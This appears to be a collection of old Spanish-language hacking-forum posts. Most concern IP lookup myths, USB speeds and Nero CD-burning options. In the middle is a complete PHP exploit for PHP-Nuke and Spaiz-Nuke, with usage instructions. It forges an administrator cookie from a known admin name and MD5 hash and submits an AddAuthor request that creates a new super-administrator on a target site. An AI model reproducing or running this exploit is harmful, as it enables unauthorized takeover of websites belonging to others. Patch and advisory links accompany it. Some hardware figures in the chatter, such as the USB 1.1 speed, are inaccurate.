Mensajes

q pueda identificar la direccion exacta de una ip, me refiero a q me diga incluso el sector donde vive la persona q le pertenezca la ip.

se ha hablado varias veces sobre este tema y no existe. Una IP de una persona no dice información sobre dónde vive. Esa información sólo la tiene un ISP y es privada.

Tambien he leido q existian un prog o una pag no recuerdo q al introducir la ip de la victima en caso de q tuviera tefefono nos daria su n° telefonico gracias a tan solo la IP.

Habia un pequeño fallo en el router SpeedStream (creo recordar) que por defecto salia el núimero de teléfono como nombre del router, asi que desde fuera se podía saber...... Pero eso tampoco existe.

USB 2.0 acepta transferencias de 480mb/s, aunque son límites teóricos o más bien dicho, máximos teóricos y USB 1.1 48mb/s, así que la velocidad es más que notable.

Una solcuión (sin pasar por cambiar la placa base) es comprar una tarjeta contraladora PCI con puertos USB, o sea una tarjeta que la conectas al puerto PCI y te permite añadir nuevos puertos usb y que además sean USB 2.0.

42x40x42x

Graba 42x, regraba a 40x y lee a 42x.

¿o es sólo un valor de referencia?

Es un valor verdadero, pero sirve como referencia porque luego nunca graba exactamente a esa velocidad, pero evidentemente una grabadora a 52x bien configurada grabará más rápido que una grabadora a 48x

Una regrabadora externa siempre es más lenta que una interna, no por la velocidad de grabación, sinó porque se conectan al ordenador por puerto USB y este siempre es más lento que IDE.

Pero los puertos USB 2.0 transfieren mucho más rápido que el USB 1.1, por lo que van bastante rápido, pero nunca tan rápido como una interna, y más si tienemos en cuenta que ya existe ATA 133.

Además algunas grabadoras externas necesitan alimentación externa, es decir enchufar al USB del ordenador y a la corriente.....

[¿Cómo parchear?http://www.phpsecure.info/]

exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP

blade ha escrito un exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP, lo ha probado con las versiones Oficiales de PHP-Nuke y funciona perfectamente .... Crea un administrador en el Portal vulnerable, a base de tener el nombre actual de el administrador y su password en MD5, un derivado del bug...

Código [Seleccionar] Expandir

<?php
/*             PHP-Nuke & Spaiz-Nuke SQL Injection Exploit
                              By
            BBBBBBBB    lll    aaaaaaaa    ddddddd    eeeeeeeee
            BBBBBBBBB   lll    aaaaaaaaa  ddddddddde  eeeeeeeee
           BBBBBBBBBB  lll     aaaaaaaaad ddddddddde eeeeeeeeee
                  BBB  lll            aad         de
                  BBB  lll    aaaaaaaaaad        dde eeeeeeeeee
           BBBBBBBBBB  lll    aaaaaaaaaad ddd    dde eeeeeeeeee
          BBBBBBBBBB   lll    aaaaaaaaaa ddd     ddeeeeeeeeeeee
          BBBBBBBBBB  lll     aaa    aaa ddd    dddeeee
          BBB    BBB  lll     aaa    aaa ddd    ddd eee
          BBB   BBBB  lll    aaa     aaa ddd    ddd eee
          BBBBBBBBB   lllllllaaa         dddddddddd eeeeeeeeee
         BBBBBBBBB     llllllaaa        ddddddddddd  eeeeeeeee
         BBBBBBBB       lllll aa        dddddddddd    eeeeeee
                          <blade@abez.org>

|Blade «blade@abez.org»|
###www.abez.org Of AbeZ
##www.rzw.com.ar By XyborG
#www.fihezine.tsx.to Of FiH eZine
*/
 echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
      <title>PHP-Nuke &amp; Spaiz-Nuke Injection Exploit v1.0 By Blade</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
      .bginput  { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      A:link    { COLOR: #000066; TEXT-DECORATION: none }
      A:visited { COLOR: #000066; TEXT-DECORATION: none }
      A:active  { COLOR: #000066; TEXT-DECORATION: none }
      A:hover   { COLOR: #000066; TEXT-DECORATION: none }
      .button   { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      </STYLE></head><body>';
     
 if (($action == "go") and ($server) and ($add_name) and ($add_email) and ($add_aid)){

        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
        
 echo "<form name='add' method='get' action='http://" . $server . "/admin.php'>
       <input type='hidden' name='op' value='AddAuthor'>
       <input type='hidden' name='add_name' value='" . $add_name . "'>
       <input type='hidden' name='add_aid' value='" . $add_aid . "'>
       <input type='hidden' name='add_email' value='" . $add_email . "'>
       <input type='hidden' name='add_url' value='" . $add_url . "'>
       <input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
       <input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
       vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
       $hash . "</strong> . <br>New Administrator : <strong>" . $add_name . "</strong>.
       In case that these data are not correct he returns from
       <a href='javascript:history.back()'><strong>«Here»</strong></a>.</font>
       <br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
       continue la operacion agregando el nuevo Administrador.</b></font></center>
       <center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
       </form>";
                              
 } else {
 
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="go">
      </font></strong></u></p>
      <div align="center">
      <TABLE width="65%" border=0 align="center" cellPadding=0 cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Servidor
      Vulneable:</font></strong></div></TD>
      </TR>
      <TR> 
      <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
      Servidor:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" value="www.">
      </div></TD>
      </TR>
      <TR> 
      <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
      Admin :</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR> 
      <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password 
          MD5:</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="50" class="bginput">
      </p></TD>
      </TR>
      </TABLE>
      <br>
      </div>
      <TABLE width="50%" border=0 align="center">
      <TBODY>
      <TR> 
      <TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Datos
      de la Cuenta:</font></strong></div></TD>
      </TR>
      <TR> 
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=50 size=30 name=add_name class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR> 
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nickname:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=30 size=30 name=add_aid class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR> 
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">E-Mail:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=60 size=30 name=add_email class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR> 
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
      <strong>
      <input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
      </strong> </font></TD>
      </TR>
      <TR> 
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
      <FONT class=tiny><strong>(Obligatorio)</strong></FONT></font></TD>
      </TR>
      <INPUT type=hidden value=AddAuthor name=op>
      <TR>
      <TD>&nbsp;</TD>
      </TR>
      </TABLE>
      <div align="center">
      <p align="center">
      <INPUT name="submit" type=submit value="Crear Administrador" class="button">
      </p>
      </FORM>';
      
 } if ($action != "go"){
 
 echo'<div align="center"><u><font size="2" face="Verdana, Arial, Helvetica, sans-serif"></font></u></div>
      <table width="100%" border="0" align="center">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Como
      Usar: </strong></font></div><td>
      </tr>
      <tr>
      <td width="18%"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Direccion
      Servidor :</font></strong></td>
      <td width="82%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es
      la URL correspondiente al Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      Admin :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la identidad
      en valor de nombre, del administrador del cual se conoce el password cifrado. 
      Ejemplo : xMan.</font></td>
      </tr>
      <tr>
      
    <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password 
      MD5 :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password
      cifrado en MD5 del administrador, cuyo nombre se conoce. Ejemplo: QmxhZGU6MWVhNTJmMjZlN2UwY2UwOGU0NjJmODdmNWUzNTA5NmM6</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el nombre
      correspondiente al nuevo Administrador a crear. Ejemplo: BaxGo.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nickname
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el Nick
      o Apodo, figurante para el nuevo administrador. Ejemplo: SysBack </font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;E-Mail
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el E-mail
      que figurar&aacute; en la nueva cuenta del Administrador. Ejemplo: sysback@phpnuke..com</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;URL
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la URL
      del Website del nuevo administrador. </font></td>
      </tr>
      <tr>
      <td height="14"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password,
      del cual el nuevo Administrador depender&aacute; para ingresar en su futura 
      cuenta. </font></td>
      </tr>
      </table>
      <br>
      <div align="center">
      <table width="45%" border="0">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Referencias:</strong></font></div></td>
      </tr>
      <tr>
      <td width="47%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas 
      Informacion De :</font></div></td>
      <td width="53%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://rst.void.ru</a> 
      </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Mas 
      Informacion</strong> De :</font></div></td>
      <td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas 
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas 
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.securityfocus.com/archive/1/340664" target="_blank">http://www.securityfocus.com</a></font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas 
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
      </tr>
      </table>';

 }
       
 echo'<center><p><font color="#003366" size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="mailto:blade@abez.org"><strong><u>PHP-Nuke
      &amp; Spaiz-Nuke SQL Injection Exploit By Blade.</u></strong></a></font></p></center>
      </div>
      </body>
      </html>';
?>


+ Info
http://cyruxnet.com.ar/phpnuke_modules.htm



¿Cómo parchear?

http://www.phpsecure.info/

Otras:
http://www.securityfocus.com/bid/8764
http://www.securityfocus.com/bid/8798

jejeje, pues no te extrañe, porque he visto las mismas explicaciones (copiar/pegar) en 3 sitios diferentes.......

Pero en otros sitios en inglés, decian lo de disc-at-once para clonar cd's y grabar iso's:

http://www.cdrfaq.org
http://www.linuxiso.org/viewdoc.php/howtoburn.html

From the menu, click on File.
Select Create CD From Disc Image from the drop down menu.
On the CD creation Setup window, click the Advanced Button, then choose Disk at Once. If you use Track at once, you'll get an unusable CD.

http://members.home.nl/lsnoek/iso.htm#Nero%20Burning%20ROM

Launch Nero.
Choose File, Burn Image and you'll be presented with a dialog box.
Click on the Files of type: dropdown box and select All Files (*.*).
Select the .ISO file you downloaded then press Open.
Next, Nero will show another dialog box of CD burning options.  Accept the defaults:
Type of Image: Data Mode 1
Block size (Bytes): 2048
Image header (Bytes): 0
Image trailer (Bytes): 0)
Choose OK.
The Write CD dialog box should appear next.
Make sure Write, Finalize CD, and Disc-At-Once are checked, then choose Write.

Y también lo dice Mordor, del que me fío más xDDD

F.A.Q. de la grabadora: v. 0.7
http://www.elhacker.net/foro/index.php?board=12;action=display;threadid=6283

Bueno cuando sepa algo en claro, lo comento.

bueno me creo que funciona, pero me gustaría saber que método de grabación es el adecuado...... y el porque funciona con los dos métodos....

En todos los sitios que he buscado comenta que para clonar un CD --> disc-at-once y para grabar una iso no queda tan claro, asi que imagino se puede hacer de las dos maneras......

Pero no me voy a dormir con esta duda existencial......  

[disc-at-once]

no pasa nada, no te preocupes...

ya me voy aclarando, pero no me gustan las opciones "por defecto",  o sea me gusta saber cómo lo hace y el porqué,  y eso que uso el asistente (no siempre) pero aunque use el asistente me gusta saber como lo graba......

Así es como se aprende. El otro dia hablaba con un amigo y usa el asistente del nero y tal y no se habia enterado que existia la opción de cd's multisesion, o sea cuando el graba un cd de datos aunque sean 100 MB, ya lo cierra y luego usa otro cd......

Te quiero decir con eso, el gran error de mucha gente, que como el Nero ya le funciona bien, no se entera de nada, apenas sabe hacer un cd porque sigue los pasos y a mi me gusta saber que métodos de grabación hay y todas las opciones "raras" que hayan.

Luego pasa que cuando sale un nuevo virus y la ostia de palurdos se infectan porque abren archivos adjuntos sin ninguna precaución....., porque no se fijan, no se enteran y no quieren aprender xDDD

He tostado varias isos y me pone siempre que son bootables o sea que lo debo estar haciendo bien, pero igualmente me gusta saber más

Y si estas en el nero y estás sin el wizard (con el new compilation), y pones Burn Image (Quemar Imagen), seleccionas la iso, pues te pone por defecto para quemar la imagen track-at-once y es disc-at-once....... aunque no se si lo grabas coomo track-at-once funcionará, ni idea...

En cambio si estás en el asistente  (el wizard ese) y pones Quemar Imagen y seleccionas la ISO te la quema directamente sin preguntar nada.....

Creo que el Clone CD usa disc-at-once y por eso hace las copias clavaditas (y aunque tengan protecciones).

[disc-at once]

Disc-at-once es para cuado queremos grabar cds de tamaño extra osea superiores a los 80 minutos o 700 MB mientras que cuando no queremos esto la opcion a usar sera Track-at-once (recomiendo siempre tener esta opcion en preferencias del nero pues la opcion puede ser peligrosa para nuestra tostadora con lo que solo la marcaremos cuando sea necesaria para la grabacion de cds de tamaño extra)

Pues yo sigo pensando que las iso y las copias de cd's se hacen con el disc-at once -->

Si queremos copiar un disco a otro, como por ejemplo para realizar una copia idéntica, éste debería ser el método a emplear y también deberíamos de decantarnos por el DAO en el caso de querer crear un disco de audio, para que todas las canciones queden almacenadas en la primera-y única- sesión, que es la única que pueden leer.

De:
http://www.insertcdr.com/articulos/metodosg.php

También comenta lo mismo Mordor en su FAQ:

http://www.elhacker.net/foro/index.php?board=12;action=display;threadid=6283

(Punto 8 --> 8. Métodos de grabación:)

O sea que por lo que he leído grabar una ISO en track-at-once es igual a tirar el cd a la basura......, pero si he leido para que hacer cd's de tamaño "extra" hay que hacer servir disc-at-once obligatoriamente.

Me has engañado Songoku xDDDD

y la forma de grabar pues lo que dice goku, para tamaño extra disc-at-once y para las demas track-at-once (al menos asi lo hago yo

Y tu también Cobac, me estáis liando joder xDDDD

el Disc-at-once/96 ni idea para que sirve.

Y pensaba que para que un cd fuera bootable habia que "Finalizarlo"........., pero veo que no

Bueno sigo con mis investigaciones, no me gusta que el nero eliga por mí, aunque lo haga bien, prefiero saber como lo hace.....

No me gusta usar el Nero Express, porque me gusta saber como lo graba y saber un poco de temas de grabación, que estoy un poco pez!!

Por eso quiero sabe esas opciones:

Finalize CD --> tiene que estar marcada (por lo que he leído una imagen iso o una copia de un cd, debe ser un cd cerrado y no multisesión claro ¿voy bien?

Write Method --> Disc-at-once  (creo que es este método, igual que sería para grabar un cd y en este caso una ISO). Track-at-once seria para hacer cd's multisesión ¿voy bien?

¿Y disc-at-once/96, para cuándo lo hago servir?

Hola,

Bueno he estado leyendo y creo que lo tengo claro, pero aún así prefiero preguntar para no meter la pata

Mis preguntas son de confirmación (espero).

Uso el Nero 5.5.x.x -->

Si utilizo para quemar un ISO el wizard (el asistente) y le pongo "Burn Image" --> tan sólo me pregunta a que velocidad quiero grabar, en cambio si lo hago con el "New Compilation" (sin el asistente) y le digo "Burn Image" y me deja elegir estas opciones:

Finalize CD --> tiene que estar marcada (por lo que he leído una imagen iso o una copia de un cd, debe ser un cd cerrado y no multisesión claro ¿voy bien?

Write Method --> Disc-at-once  (creo que es este método, igual que sería para grabar un cd y en este caso una ISO). Track-at-once seria para hacer cd's multisesión ¿voy bien?

¿Y disc-at-once/96, para cuándo lo hago servir?

Imagino que si no pongo finalizar cd y lo grabo en track-at-once el cd' es para tirar y además no sería bootable ni nada